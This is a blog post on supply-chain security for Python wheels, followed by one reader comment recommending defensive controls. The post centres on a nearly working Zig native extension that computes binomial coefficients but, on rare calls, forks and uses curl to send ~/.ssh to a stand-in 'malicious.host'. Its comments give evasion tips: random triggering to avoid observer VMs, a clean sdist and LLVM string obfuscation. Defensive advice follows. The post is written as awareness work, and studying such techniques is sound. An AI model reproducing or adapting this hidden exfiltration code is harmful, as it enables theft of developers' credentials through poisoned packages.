Or maybe we should consider APT to include the definition "Adequate persistent threat" as well.
There are people trying to do the thankless job of keeping package registries free of malicious code. Here's a recent blogpost from phylum about a campaign they detected on both npm and pypi
What happens when attackers get stymied by things that are obvious? They either try and outpace detection or they get quieter.
The below is a nearly ready to go way to generate a malicious python wheel that still looks like it does what it is supposed to. Paired with an llvm plugin that does string obfuscation, are the defenders ready to handle it?
const std = @import("std");
const py = @import("pydust");
fn actual_binomial_coeff(n: u64, k: u64) u64 {
if (n > 60) return 0; //documented limitation due to math and int sizes
if (k == 0) return 1;
if (n <= k) return 0;
return @divExact(n * actual_binomial_coeff(n - 1, k - 1), k);
}
export fn binomial_coeff(n: u64, k: u64) u64 {
// in the sdist, just have this do: return actual_binomial_coeff(n, k);
const current_time = std.time.microTimestamp();
var prng = std.rand.DefaultPrng.init(@intCast(u64, current_time));
const r = prng.random();
// We only want to do this some of the time.
// This decreases the chances we get "seen" in an observer VM
// and we expect that native code to optimize python stuff is gonna get called a lot
// so we don't need to be too noisy with trying to send the same stuff all the time.
if (r.intRangeAtMost(u64, 0, 1000) < 1000) return actual_binomial_coeff(n, k);
// and for that 1 in 1000 call:
const fork_pid = std.os.fork() catch {
// if we can't fork, behave as expected.
return actual_binomial_coeff(n, k);
};
if (fork_pid == 0) {
// This is the child
// Almost nothing in the child of a posix fork is safe to do prior to an exec(v) call,
// so we stick the malicious bit here and do it via execvp
//
// These don't need to be obfuscated here, we aren't including it in the sdist
// instead, obfuscate all strings with an llvm plugin to keep the
// source clean and have reusable obfuscation
const path = "curl";
const args = [_:null]?[*:0]const u8{ "-X", "POST", "malicious.host", "--data-binary", "~/.ssh" };
const envp = [_:null]?[*:0]const u8{null};
std.os.execvpeZ(path, args[0..], envp[0..]) catch {};
} else {
// parent is safe after a fork to do whatever they want
// remember, malicious code should only be unsafe in how it's malicious.
// don't make noise.
// This is where we would call the thing we had a justifcation for native code in python to begin with
// this existing and working decreases the odds that people notice an issue, it's working as they expect.
return actual_binomial_coeff(n, k);
}
return actual_binomial_coeff(n, k);
}
comptime {
py.rootmodule(@This());
}
zig's standard library includes an HTTP client, sockets, and so on. This can be modified to be done without fork and execv and curl even though all are likely to be available on developer machines. zig can import c code, so could just link libcurl too.
This isn't zig specific though, native Python extensions can be written in go, rust, c, c++, and so on. Nothing about this example is too picky about how it happens, the inherent flaw is that we have wheels in the first place and it's easy to shove something small and malicious into a binary that won't be easily found statically.
Nothing about this is complicated. It's simple, it's highly portable, and it's using tools that make sense for a native Python extension to be using. If the malicious wheels are uploaded next to a non-malicious version as a source distribution, how long would it take to be detected? Most attackers that have been detected have not gone to these lengths. But "these lengths" is a phrase that makes this seem harder than it is. Are we as developers ready for the consequences of even a slight bit of increased sophistication that will eventually (and could already) happen? These are the tactics that 5 minutes of "Okay, but the binaries aren't reproducibly built" came up with, this isn't even close to what an APT could do if motivated.
So how can we be proactive and defend against this?
Vet your dependencies. Pin dependencies with hashes. If you have concerns about trusting binaries, vet the source and build them yourself.
If you're doing this at an enterprise level, have a local artifactory/wheelhouse with a limited set of available dependencies and vetted versions. Don't let developers install directly from external package indexes, including Pypi.
Be proactive and vet your dependencies in advance, rather than hoping you aren't the victim of anything only detected while playing catchup.
Note on Python focus: Python is the only major language where shipping binaries for libraries that aren't built exclusively on a trusted build server is the norm (via wheels). It can happen elsewhere too, don't get complacent just because I didn't name a tool you use, think about if the same general behavior pattern applies to you. Cargo crates can technically ship with included binaries, as can many others. It's just not the norm there, so it's more obvious when something isn't right.
Note on ethics and providing most of an increase in sophistication from current attacks: In the interest of raising awareness of this issue, yes, I've provided "most of the way" to a full, more sophisticated exploit method. There are subtle things wrong and missing from the example to prevent it from being truly copy/pastable. Keep in "mind most of the way" is an extremely low effort here and uses existing known techniques that match those already in use, only moved to binaries to be included in wheels rather than build scripts (See the linked blog post for equivalent reliance on calling curl for the exact same secrets). The correct defensive posture here prevents this entirely and the tools for it have existed for years. Don't be caught lacking.
Top comments (1)
Thank you for highlighting this increasingly common attacker path: poisoning software supply chain(s) 🙏 In particular, the practice of locating popular but neglected / unmaintained packages and offering to maintain them, then poisoning them.
It seems to me that identity & provenance is critical to protect these ecosystems (so one can ask for example: "who is \@am-fe and can we trust them and their code"), along with a healthy mistrust of shiny new toys that promise to solve all your problems!
In my previous employment developing PCIDSS compliant software, we had a posture similar to that which you describe: vetted inputs, local repositories, pinned versions and signature / hash checks. We chose not to constrain developers to internal sources during feature creation / exploration, but they needed to argue for the inclusion of new dependencies during pre-integration review, and work with our audit / vetting specialists to assure ourselves (and our PCIDSS auditor) that any new thing was trustworthy.